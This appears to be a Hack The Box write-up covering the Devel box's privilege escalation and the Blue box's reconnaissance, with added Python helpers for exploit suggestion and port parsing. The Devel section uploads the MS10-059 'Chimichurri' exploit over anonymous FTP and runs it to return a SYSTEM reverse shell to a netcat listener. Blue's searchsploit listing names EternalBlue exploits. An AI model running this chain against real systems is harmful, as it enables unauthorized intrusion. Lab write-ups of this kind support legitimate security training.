adpu320      adpu320                Kernel        28/2/2007 2:03:08
AFD          Ancillary Function Dri Kernel        14/7/2009 2:12:34
agp440       Intel AGP Bus Filter   Kernel        14/7/2009 2:25:36
aic78xx      aic78xx                Kernel        12/4/2006 3:20:11
aliide       aliide                 Kernel        14/7/2009 2:11:17
amdagp       AMD AGP Bus Filter Dri Kernel        14/7/2009 2:25:36
amdide       amdide                 Kernel        14/7/2009 2:11:19
AmdK8        AMD K8 Processor Drive Kernel        14/7/2009 2:11:03
AmdPPM       AMD Processor Driver   Kernel        14/7/2009 2:11:03
amdsata      amdsata                Kernel        19/5/2009 8:54:22
amdsbs       amdsbs                 Kernel        20/3/2009 8:35:26
amdxata      amdxata                Kernel        19/5/2009 8:57:35
AppID        AppID Driver           Kernel        14/7/2009 2:36:51
arc          arc                    Kernel        25/5/2007 12:31:06
arcsas       arcsas                 Kernel        14/1/2009 9:26:37
AsyncMac     RAS Asynchronous Media Kernel        14/7/2009 2:54:46
atapi        IDE Channel            Kernel        14/7/2009 2:11:15
b06bdrv      Broadcom NetXtreme II  Kernel        14/2/2009 12:10:59
b57nd60x     Broadcom NetXtreme Gig Kernel        26/4/2009 2:15:34
Beep         Beep                   Kernel        14/7/2009 2:45:00
blbdrive     blbdrive               Kernel        14/7/2009 2:23:04
bowser       Browser Support Driver File System   14/7/2009 2:14:21
BrFiltLo     Brother USB Mass-Stora Kernel        7/8/2006 12:33:45
BrFiltUp     Brother USB Mass-Stora Kernel        7/8/2006 12:33:45
Brserid      Brother MFC Serial Por Kernel        7/8/2006 12:33:50
BrSerWdm     Brother WDM Serial dri Kernel        7/8/2006 12:33:44
BrUsbMdm     Brother MFC USB Fax On Kernel        7/8/2006 12:33:43
BrUsbSer     Brother MFC USB Serial Kernel        9/8/2006 3:02:02
BTHMODEM     Bluetooth Serial Commu Kernel        14/7/2009 2:51:34
cdfs         CD/DVD File System Rea File System   14/7/2009 2:11:14
cdrom        CD-ROM Driver          Kernel        14/7/2009 2:11:24
circlass     Consumer IR Devices    Kernel        14/7/2009 2:51:17
CLFS         Common Log (CLFS)      Kernel        14/7/2009 2:11:10
CmBatt       Microsoft AC Adapter D Kernel        14/7/2009 2:19:18
cmdide       cmdide                 Kernel        14/7/2009 2:11:18
CNG          CNG                    Kernel        14/7/2009 2:32:55
Compbatt     Microsoft Composite Ba Kernel        14/7/2009 2:19:18
CompositeBus Composite Bus Enumerat Kernel        14/7/2009 2:45:26
crcdisk      Crcdisk Filter Driver  Kernel        14/7/2009 2:46:05
CSC          Offline Files Driver   Kernel        14/7/2009 2:15:08
DfsC         DFS Namespace Client D File System   14/7/2009 2:14:16
discache     System Attribute Cache Kernel        14/7/2009 2:24:04
Disk         Disk Driver            Kernel        14/7/2009 2:11:28
DXGKrnl      LDDM Graphics Subsyste Kernel        14/7/2009 2:26:15
E1G60        Intel(R) PRO/1000 NDIS Kernel        29/5/2008 2:14:11
ebdrv        Broadcom NetXtreme II  Kernel        31/12/2008 6:06:23
elxstor      elxstor                Kernel        4/2/2009 12:09:33
ErrDev       Microsoft Hardware Err Kernel        14/7/2009 2:19:18
exfat        exFAT File System Driv File System   14/7/2009 2:14:01
fastfat      FAT12/16/32 File Syste File System   14/7/2009 2:14:01
fdc          Floppy Disk Controller Kernel        14/7/2009 2:45:45
FileInfo     File Information FS Mi File System   14/7/2009 2:21:51
Filetrace    Filetrace              File System   14/7/2009 2:15:29
flpydisk     Floppy Disk Driver     Kernel        14/7/2009 2:45:45
FltMgr       FltMgr                 File System   14/7/2009 2:11:13
FsDepends    File System Dependency File System   14/7/2009 2:15:38
fvevol       Bitlocker Drive Encryp Kernel        14/7/2009 2:13:01
gagp30kx     Microsoft Generic AGPv Kernel        14/7/2009 2:25:42
hcw85cir     Hauppauge Consumer Inf Kernel        11/5/2009 10:22:41
HDAudBus     Microsoft UAA Bus Driv Kernel        14/7/2009 2:50:55
HidBatt      HID UPS Battery Driver Kernel        14/7/2009 2:19:21
HidBth       Microsoft Bluetooth HI Kernel        14/7/2009 2:51:33
HidIr        Microsoft Infrared HID Kernel        14/7/2009 2:51:04
HidUsb       Microsoft HID Class Dr Kernel        14/7/2009 2:51:04
HpSAMD       HpSAMD                 Kernel        19/5/2009 2:42:46
HTTP         HTTP                   Kernel        14/7/2009 2:12:53
hwpolicy     Hardware Policy Driver Kernel        14/7/2009 2:11:01
i8042prt     i8042 Keyboard and PS/ Kernel        14/7/2009 2:11:23
iaStorV      iaStorV                Kernel        8/4/2009 7:54:58
iirsp        iirsp                  Kernel        13/12/2005 11:48:01
intelide     intelide               Kernel        14/7/2009 2:11:19
intelppm     Intel Processor Driver Kernel        14/7/2009 2:11:03
IpFilterDriv IP Traffic Filter Driv Kernel        14/7/2009 2:54:28
IPMIDRV      IPMIDRV                Kernel        14/7/2009 2:30:59
IPNAT        IP Network Address Tra Kernel        14/7/2009 2:54:28
IRENUM       IR Bus Enumerator      Kernel        14/7/2009 2:53:27
isapnp       isapnp                 Kernel        14/7/2009 2:19:29
iScsiPrt     iScsiPort Driver       Kernel        14/7/2009 2:46:21
kbdclass     Keyboard Class Driver  Kernel        14/7/2009 2:11:15
kbdhid       Keyboard HID Driver    Kernel        14/7/2009 2:45:09
KSecDD       KSecDD                 Kernel        14/7/2009 2:11:56
KSecPkg      KSecPkg                Kernel        14/7/2009 2:34:00
lltdio       Link-Layer Topology Di Kernel        14/7/2009 2:53:18
LSI_FC       LSI_FC                 Kernel        10/12/2008 12:28:47
LSI_SAS      LSI_SAS                Kernel        19/5/2009 3:19:55
LSI_SAS2     LSI_SAS2               Kernel        19/5/2009 3:31:29
LSI_SCSI     LSI_SCSI               Kernel        17/4/2009 1:14:47
luafv        UAC File Virtualizatio File System   14/7/2009 2:15:44
megasas      megasas                Kernel        19/5/2009 4:09:36
MegaSR       MegaSR                 Kernel        19/5/2009 4:25:17
Modem        Modem                  Kernel        14/7/2009 2:55:24
monitor      Microsoft Monitor Clas Kernel        14/7/2009 2:25:58
mouclass     Mouse Class Driver     Kernel        14/7/2009 2:11:15
mouhid       Mouse HID Driver       Kernel        14/7/2009 2:45:08
mountmgr     Mount Point Manager    Kernel        14/7/2009 2:11:27
mpio         mpio                   Kernel        14/7/2009 2:46:13
mpsdrv       Windows Firewall Autho Kernel        14/7/2009 2:52:52
MRxDAV       WebDav Client Redirect File System   14/7/2009 2:14:25
mrxsmb       SMB MiniRedirector Wra File System   14/7/2009 2:14:24
mrxsmb10     SMB 1.x MiniRedirector File System   14/7/2009 2:14:34
mrxsmb20     SMB 2.0 MiniRedirector File System   14/7/2009 2:14:29
msahci       msahci                 Kernel        14/7/2009 2:45:50
msdsm        msdsm                  Kernel        14/7/2009 2:46:19
Msfs         Msfs                   File System   14/7/2009 2:11:26
mshidkmdf    Pass-through HID to KM Kernel        14/7/2009 2:51:07
msisadrv     msisadrv               Kernel        14/7/2009 2:11:09
MsRPC        MsRPC                  Kernel        14/7/2009 2:11:59
mssmbios     Microsoft System Manag Kernel        14/7/2009 2:19:25
MTConfig     Microsoft Input Config Kernel        14/7/2009 2:46:55
Mup          Mup                    File System   14/7/2009 2:14:14
NativeWifiP  NativeWiFi Filter      Kernel        14/7/2009 2:51:59
NDIS         NDIS System Driver     Kernel        14/7/2009 2:12:24
NdisCap      NDIS Capture LightWeig Kernel        14/7/2009 2:52:44
NdisTapi     Remote Access NDIS TAP Kernel        14/7/2009 2:54:24
Ndisuio      NDIS Usermode I/O Prot Kernel        14/7/2009 2:53:51
NdisWan      Remote Access NDIS WAN Kernel        14/7/2009 2:54:34
NDProxy      NDIS Proxy             Kernel        14/7/2009 2:54:27
NetBIOS      NetBIOS Interface      File System   14/7/2009 2:53:54
NetBT        NetBT                  Kernel        14/7/2009 2:12:18
nfrd960      nfrd960                Kernel        7/6/2006 12:12:15
Npfs         Npfs                   File System   14/7/2009 2:11:31
nsiproxy     NSI proxy service driv Kernel        14/7/2009 2:12:08
Ntfs         Ntfs                   File System   14/7/2009 2:12:05
Null         Null                   Kernel        14/7/2009 2:11:12
nvraid       nvraid                 Kernel        20/5/2009 9:43:36
nvstor       nvstor                 Kernel        20/5/2009 9:44:09
nv_agp       NVIDIA nForce AGP Bus  Kernel        14/7/2009 2:25:50
ohci1394     1394 OHCI Compliant Ho Kernel        14/7/2009 2:51:29
Parport      Parallel port driver   Kernel        14/7/2009 2:45:34
partmgr      Partition Manager      Kernel        14/7/2009 2:11:35
Parvdm       Parvdm                 Kernel        14/7/2009 2:45:29
pci          PCI Bus Driver         Kernel        14/7/2009 2:11:16
pciide       pciide                 Kernel        14/7/2009 2:11:19
pcmcia       pcmcia                 Kernel        14/7/2009 2:19:29
pcw          Performance Counters f Kernel        14/7/2009 2:11:10
PEAUTH       PEAUTH                 Kernel        14/7/2009 3:35:44
PptpMiniport WAN Miniport (PPTP)    Kernel        14/7/2009 2:54:47
Processor    Processor Driver       Kernel        14/7/2009 2:11:03
Psched       QoS Packet Scheduler   Kernel        14/7/2009 2:53:58
pvscsi       pvscsi Storage Control Kernel        26/1/2016 1:15:17
ql2300       ql2300                 Kernel        23/1/2009 1:28:52
ql40xx       ql40xx                 Kernel        19/5/2009 4:17:31
RasAcd       Remote Access Auto Con Kernel        14/7/2009 2:54:40
RasAgileVpn  WAN Miniport (IKEv2)   Kernel        14/7/2009 2:55:00
Rasl2tp      WAN Miniport (L2TP)    Kernel        14/7/2009 2:54:33
RasPppoe     Remote Access PPPOE Dr Kernel        14/7/2009 2:54:53
RasSstp      WAN Miniport (SSTP)    Kernel        14/7/2009 2:54:57
rdbss        Redirected Buffering S File System   14/7/2009 2:14:26
rdpbus       Remote Desktop Device  Kernel        14/7/2009 3:02:40
RDPCDD       RDPCDD                 Kernel        14/7/2009 3:01:40
RDPDR        Terminal Server Device Kernel        14/7/2009 3:02:56
RDPENCDD     RDP Encoder Mirror Dri Kernel        14/7/2009 3:01:39
RDPREFMP     Reflector Display Driv Kernel        14/7/2009 3:01:41
RDPWD        RDP Winstation Driver  Kernel        14/7/2009 3:01:50
rdyboost     ReadyBoost             Kernel        14/7/2009 2:22:02
rspndr       Link-Layer Topology Di Kernel        14/7/2009 2:53:20
s3cap        s3cap                  Kernel        14/7/2009 2:28:46
sbp2port     sbp2port               Kernel        14/7/2009 2:11:28
scfilter     Smart card PnP Class F Kernel        14/7/2009 2:33:50
Serenum      Serenum Filter Driver  Kernel        14/7/2009 2:45:27
Serial       Serial Port Driver     Kernel        14/7/2009 2:45:33
sermouse     Serial Mouse Driver    Kernel        14/7/2009 2:45:08
sffdisk      SFF Storage Class Driv Kernel        14/7/2009 2:45:52
sffp_mmc     SFF Storage Protocol D Kernel        14/7/2009 2:45:52
sffp_sd      SFF Storage Protocol D Kernel        14/7/2009 2:45:51
sfloppy      High-Capacity Floppy D Kernel        14/7/2009 2:45:52
sisagp       SIS AGP Bus Filter     Kernel        14/7/2009 2:25:35
SiSRaid2     SiSRaid2               Kernel        24/9/2008 9:19:45
SiSRaid4     SiSRaid4               Kernel        2/10/2008 12:52:22
Smb          Message-oriented TCP/I Kernel        14/7/2009 2:53:39
spldr        Security Processor Loa Kernel        11/5/2009 7:13:47
srv          Server SMB 1.xxx Drive File System   14/7/2009 2:15:10
srv2         Server SMB 2.xxx Drive File System   14/7/2009 2:14:52
srvnet       srvnet                 File System   14/7/2009 2:14:45
stexstor     stexstor               Kernel        18/2/2009 1:03:21
storflt      Disk Virtual Machine B Kernel        14/7/2009 2:28:44
storvsc      storvsc                Kernel        14/7/2009 2:28:44
swenum       Software Bus Driver    Kernel        14/7/2009 2:45:08
Tcpip        TCP/IP Protocol Driver Kernel        14/7/2009 2:13:18
TCPIP6       Microsoft IPv6 Protoco Kernel        14/7/2009 2:13:18
tcpipreg     TCP/IP Registry Compat Kernel        14/7/2009 2:54:14
TDPIPE       TDPIPE                 Kernel        14/7/2009 3:01:36
TDTCP        TDTCP                  Kernel        14/7/2009 3:01:37
tdx          NetIO Legacy TDI Suppo Kernel        14/7/2009 2:12:10
TermDD       Terminal Device Driver Kernel        14/7/2009 3:01:35
tssecsrv     Remote Desktop Service Kernel        14/7/2009 3:01:50
tunnel       Microsoft Tunnel Minip Kernel        14/7/2009 2:54:03
uagp35       Microsoft AGPv3.5 Filt Kernel        14/7/2009 2:25:40
udfs         udfs                   File System   14/7/2009 2:14:09
uliagpkx     Uli AGP Bus Filter     Kernel        14/7/2009 2:25:47
umbus        UMBus Enumerator Drive Kernel        14/7/2009 2:51:38
UmPass       Microsoft UMPass Drive Kernel        14/7/2009 2:51:35
usbccgp      Microsoft USB Generic  Kernel        14/7/2009 2:51:31
usbcir       eHome Infrared Receive Kernel        14/7/2009 2:51:18
usbehci      Microsoft USB 2.0 Enha Kernel        14/7/2009 2:51:14
usbhub       Microsoft USB Standard Kernel        14/7/2009 2:52:06
usbohci      Microsoft USB Open Hos Kernel        14/7/2009 2:51:14
usbprint     Microsoft USB PRINTER  Kernel        14/7/2009 3:17:06
USBSTOR      USB Mass Storage Drive Kernel        14/7/2009 2:51:19
usbuhci      Microsoft USB Universa Kernel        14/7/2009 2:51:10
vdrvroot     Microsoft Virtual Driv Kernel        14/7/2009 2:46:19
vga          vga                    Kernel        14/7/2009 2:25:49
VgaSave      VgaSave                Kernel        14/7/2009 2:25:50
vhdmp        vhdmp                  Kernel        14/7/2009 2:46:25
viaagp       VIA AGP Bus Filter     Kernel        14/7/2009 2:25:39
ViaC7        VIA C7 Processor Drive Kernel        14/7/2009 2:11:03
viaide       viaide                 Kernel        14/7/2009 2:11:20
vm3dmp       vm3dmp                 Kernel        14/12/2016 12:32:48
vmbus        Virtual Machine Bus    Kernel        14/7/2009 2:28:53
VMBusHID     VMBusHID               Kernel        14/7/2009 2:28:45
vmci         VMware VMCI Bus Driver Kernel        4/6/2016 11:06:29
VMMemCtl     Memory Control Driver  Kernel        5/3/2016 1:15:45
vmmouse      VMware Pointing Device Kernel        20/2/2016 1:14:08
volmgr       Volume Manager Driver  Kernel        14/7/2009 2:11:25
volmgrx      Dynamic Volume Manager Kernel        14/7/2009 2:11:41
volsnap      Storage volumes        Kernel        14/7/2009 2:11:34
vsmraid      vsmraid                Kernel        31/1/2009 3:13:29
vsock        vSockets Virtual Machi Kernel        22/6/2016 11:07:52
vwifibus     Virtual WiFi Bus Drive Kernel        14/7/2009 2:52:02
WacomPen     Wacom Serial Pen HID D Kernel        14/7/2009 2:46:53
WANARP       Remote Access IP ARP D Kernel        14/7/2009 2:55:02
Wanarpv6     Remote Access IPv6 ARP Kernel        14/7/2009 2:55:02
Wd           Wd                     Kernel        14/7/2009 2:11:31
Wdf01000     Kernel Mode Driver Fra Kernel        14/7/2009 2:11:36
WfpLwf       WFP Lightweight Filter Kernel        14/7/2009 2:53:51
WIMMount     WIMMount               File System   14/7/2009 2:17:57
WmiAcpi      Microsoft Windows Mana Kernel        14/7/2009 2:19:16
ws2ifsl      Windows Socket 2.0 Non Kernel        14/7/2009 2:55:01
WudfPf       User Mode Driver Frame Kernel        14/7/2009 2:50:13

c:\windows\system32\inetsrv>

Exploit Suggester

Devel Machine

C:> systeminfo > systeminfo.txt

Kalibox

#  ./windows-exploit-suggester.py --database 2019-09-10-mssb.xls --systeminfo systeminfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 179 potential bulletins(s) with a database of 137 known exploits
[*] there are now 179 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 32-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
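The suggester output above is the product of a simple comparison: the OS version and installed hotfixes parsed from systeminfo.txt against a table of bulletins and the KB that fixes each. As an added example (not the page's code, nor windows-exploit-suggester's own), here is that logic in Python with a constructed systeminfo excerpt for the DEVEL box and a five-entry bulletin table copied from the page's output. The KB numbers are the ones printed in parentheses there; the version-to-product mapping and the patched/Server 2008 R2 variants are assumptions for illustration.

```python
"""What windows-exploit-suggester does, in miniature: identify the OS from
`systeminfo` output, collect installed KBs, and list bulletins whose fix is absent.

Added example, not code from the page or from the windows-exploit-suggester
project. BULLETINS is a hand-copied subset (KB numbers as printed in the page's
suggester output); the real tool loads the full Microsoft bulletin spreadsheet.
"""
import re

# Constructed systeminfo excerpt matching what the page reports for DEVEL:
# Windows 7, 32-bit, zero hotfixes.
SYSTEMINFO = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 N/A
"""

# Same box after the MS10-059 fix (constructed; "[NN]: KBxxxxxx" is how
# systeminfo lists hotfixes).
SYSTEMINFO_PATCHED = SYSTEMINFO.replace(
    "Hotfix(s):                 N/A",
    "Hotfix(s):                 1 Hotfix(s) Installed.\n"
    "                           [01]: KB982799",
)

# bulletin -> (KB that fixes it, products it applies to). Subset for illustration.
BULLETINS = {
    "MS10-015": ("KB977165",  {"Windows 7"}),   # kernel EoP (KiTrap0D)
    "MS10-047": ("KB981852",  {"Windows 7"}),   # kernel EoP
    "MS10-059": ("KB982799",  {"Windows 7"}),   # Tracing Feature EoP (Chimichurri)
    "MS11-011": ("KB2393802", {"Windows 7"}),   # kernel EoP
    "MS13-005": ("KB2778930", {"Windows 7"}),   # win32k EoP
}

# (major, minor) -> (client name, server name); the OS Name line says which.
# Assumed mapping; Server 2019/2022 also report 10.0 and need the build number.
VERSIONS = {
    (5, 1): ("Windows XP", "Windows XP"),
    (5, 2): ("Windows XP", "Windows Server 2003"),
    (6, 0): ("Windows Vista", "Windows Server 2008"),
    (6, 1): ("Windows 7", "Windows Server 2008 R2"),
    (6, 2): ("Windows 8", "Windows Server 2012"),
    (6, 3): ("Windows 8.1", "Windows Server 2012 R2"),
    (10, 0): ("Windows 10", "Windows Server 2016"),
}


def identify(text):
    """Return (product, '32-bit'|'64-bit') from OS Version / OS Name / System Type."""
    ver = re.search(r"^OS Version:\s+(\d+)\.(\d+)\.", text, re.M)
    name = re.search(r"^OS Name:\s+(.*)$", text, re.M)
    arch = re.search(r"^System Type:\s+(\S+)", text, re.M)
    if not (ver and name and arch):
        raise ValueError("not a systeminfo dump")
    client, server = VERSIONS[(int(ver.group(1)), int(ver.group(2)))]
    product = server if "Server" in name.group(1) else client
    bits = "64-bit" if arch.group(1).lower().startswith("x64") else "32-bit"
    return product, bits


def installed_kbs(text):
    """Every KB number listed under Hotfix(s); empty set for 'N/A'."""
    return set(re.findall(r"\bKB\d{6,7}\b", text))


def missing(text, bulletins=BULLETINS):
    """Bulletins that apply to this product and whose fixing KB is not installed."""
    product, _ = identify(text)
    kbs = installed_kbs(text)
    return sorted(b for b, (kb, products) in bulletins.items()
                  if product in products and kb not in kbs)


if __name__ == "__main__":
    product, bits = identify(SYSTEMINFO)
    print(f"windows version identified as '{product} {bits}'")
    print(f"{len(installed_kbs(SYSTEMINFO))} hotfix(es) installed")
    for bulletin in missing(SYSTEMINFO):
        print("  candidate:", bulletin)
```

The page's "comparing the 0 hotfix(es)" line is exactly `installed_kbs` returning an empty set. Two things the real tool does that this sketch does not: account for superseding updates (a fix can be present under a later cumulative KB without the original KB number appearing) and attach the exploit-db and Metasploit hints. Either way the list is a set of candidates to verify, which is how the writeup proceeds: MS10-059 is tried and happens to work.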

Working Exploit

MS10-059 worked and I got the binary from https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS10-059/MS10-059.exe.

On Kalibox

ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: <password>
230 User logged in.
Remote system type is Windows_NT.
ftp> put  MS10-059.exe

Devel Machine

c:\inetpub\wwwroot>MS10-059.exe
MS10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
c:\inetpub\wwwroot>MS10-059.exe YOUR-IP 4444
MS10-059.exe YOUR-IP 4444

On Kalibox

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [YOUR-IP] from (UNKNOWN) [10.10.10.5] 49160
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\inetpub\wwwroot>whoami
whoami
nt authority\system

Hack The Box - Blue

Box Details

Blue

OS       DIFFICULTY  POINTS
Windows  EASY        20

ENUMERATION

Initial Port Scanning

masscan

To speed things up I am going to run masscan to get the initial port availability.

COMMAND

masscan -p1-65535,U:1-65535 10.10.10.40 --rate=1000 -e tun0 -oG masscan-Blue

RESULT

# Masscan 1.0.5 scan initiated Sun Sep  8 08:11:45 2019
# Ports scanned: TCP(65535;1-65535,) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.10.10.40 ()    Ports: 135/open/tcp////
Host: 10.10.10.40 ()    Ports: 49154/open/tcp////
Host: 10.10.10.40 ()    Ports: 445/open/tcp////
Host: 10.10.10.40 ()    Ports: 49155/open/tcp////
# Masscan done at Sun Sep  8 08:18:18 2019

nmap

Ports available for nmap scanning (from the masscan output above):

  • 135
  • 445
  • 49154
  • 49155

Note: the nmap command below was run with 49253 and 41955 instead of the two masscan ports, a transcription slip, which is why those two show as closed in the result.
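Retyping ports between tools is where mismatches creep in. As an added example (not part of the original writeup), the Python below reads masscan's grepable (-oG) output, groups open ports per host and protocol, and emits the follow-up nmap command with the -p list built programmatically. The sample is the page's masscan result plus one constructed UDP line (137/udp) so the UDP branch is exercised.

```python
"""Build the nmap follow-up command straight from masscan -oG output.

Added example, not code from the original writeup. SAMPLE is the page's
masscan result for 10.10.10.40 plus one constructed UDP line.
"""
import re

SAMPLE = """\
# Masscan 1.0.5 scan initiated Sun Sep  8 08:11:45 2019
# Ports scanned: TCP(65535;1-65535,) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.10.10.40 ()    Ports: 135/open/tcp////
Host: 10.10.10.40 ()    Ports: 49154/open/tcp////
Host: 10.10.10.40 ()    Ports: 445/open/tcp////
Host: 10.10.10.40 ()    Ports: 49155/open/tcp////
Host: 10.10.10.40 ()    Ports: 137/open/udp////
# Masscan done at Sun Sep  8 08:18:18 2019
"""

# masscan writes one "Host: <ip> (<name>)  Ports: <port>/<state>/<proto>////" line per port.
LINE = re.compile(r"^Host:\s+(\S+)\s+\(\S*\)\s+Ports:\s+(.*)$")
PORT = re.compile(r"(\d+)/(open)/(tcp|udp)")


def parse_masscan(text):
    """Return {host: {"tcp": [sorted ports], "udp": [sorted ports]}}."""
    hosts = {}
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue                      # '#' comment lines and blanks
        host, ports = m.groups()
        entry = hosts.setdefault(host, {"tcp": set(), "udp": set()})
        for port, _state, proto in PORT.findall(ports):
            entry[proto].add(int(port))   # set: duplicates from re-scans collapse
    return {h: {p: sorted(s) for p, s in e.items()} for h, e in hosts.items()}


def nmap_port_arg(tcp, udp):
    """Format ports in nmap's -p syntax, e.g. 'T:135,445,U:137'."""
    parts = []
    if tcp:
        parts.append("T:" + ",".join(map(str, tcp)))
    if udp:
        parts.append("U:" + ",".join(map(str, udp)))
    return ",".join(parts)


def nmap_commands(text, outprefix="nmap"):
    """One nmap command per host; -sU is added only when UDP ports were found."""
    cmds = []
    for host, ports in parse_masscan(text).items():
        flags = "-sC -sV" + (" -sU" if ports["udp"] else "")
        arg = nmap_port_arg(ports["tcp"], ports["udp"])
        cmds.append(f"nmap {flags} -p{arg} -oA {outprefix}-{host} {host}")
    return cmds


if __name__ == "__main__":
    for cmd in nmap_commands(SAMPLE, outprefix="nmap-Blue"):
        print(cmd)
```

Feed it the real file with `python3 masscan2nmap.py < masscan-Blue` (or read the file in place of SAMPLE); the `U:` half of the port list only matters when masscan actually reported UDP ports, and `-sU` needs root.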

COMMAND

nmap -sC -sV -p135,49253,445,41955 -oA nmap-Blue 10.10.10.40

RESULT

Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-08 09:22 BST
Nmap scan report for 10.10.10.40
Host is up (0.041s latency).

PORT      STATE  SERVICE      VERSION
135/tcp   open   msrpc        Microsoft Windows RPC
445/tcp   open   microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
41955/tcp closed unknown
49253/tcp closed unknown
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -21m12s, deviation: 34m37s, median: -1m13s
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-09-08T09:21:37+01:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-09-08T08:21:39
|_  start_date: 2019-09-08T07:59:13

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.52 seconds

Port Scan Summary

Server IP    OPEN TCP PORTS  OPEN UDP PORTS
10.10.10.40  135,445         N/A

EXPLOITS

Exploit Search

Use searchsploit to investigate exploits for Windows 7 SP1 and SMB.
COMMAND

#  searchsploit windows 7 smb

RESULT

----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                       |  Path
                                                                                                                                                     | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054)                                                                                        | exploits/windows/dos/14607.py
Microsoft DNS RPC Service - 'extractQuotedChar()' Remote Overflow 'SMB' (MS07-029) (Metasploit)                                                      | exploits/windows/remote/16366.rb
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)                            | exploits/windows/remote/43970.rb
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)                                                         | exploits/windows/remote/14674.txt
Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)                                                                      | exploits/windows/dos/40744.txt
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)                                                                        | exploits/windows/dos/41891.rb
Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service                                                                        | exploits/windows/dos/12524.py
Microsoft Windows - SmbRelay3 NTLM Replay (MS08-068)                                                                                                 | exploits/windows/remote/7125.txt
Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation                                                          | exploits/windows/local/47115.txt
**Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                     | exploits/windows/remote/42031.py**
Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)                                                                      | exploits/windows/dos/12273.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                 | exploits/windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                           | exploits/windows_x86-64/remote/42030.py
Microsoft Windows 95/Windows for Workgroups - 'smbclient' Directory Traversal                                                                        | exploits/windows/remote/20371.txt
Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client                                                        | exploits/windows/remote/19197.txt
Microsoft Windows SMB Server (v1/v2) - Mount Point Arbitrary Device Open Privilege Escalation                                                        | exploits/windows/dos/43517.txt
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)                                                        | exploits/windows_x86-64/remote/41987.py
Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)                                                 | exploits/windows/dos/9594.txt
Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (1)                                                            | exploits/windows/dos/21746.c
Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (2)                                                            | exploits/windows/dos/21747.txt
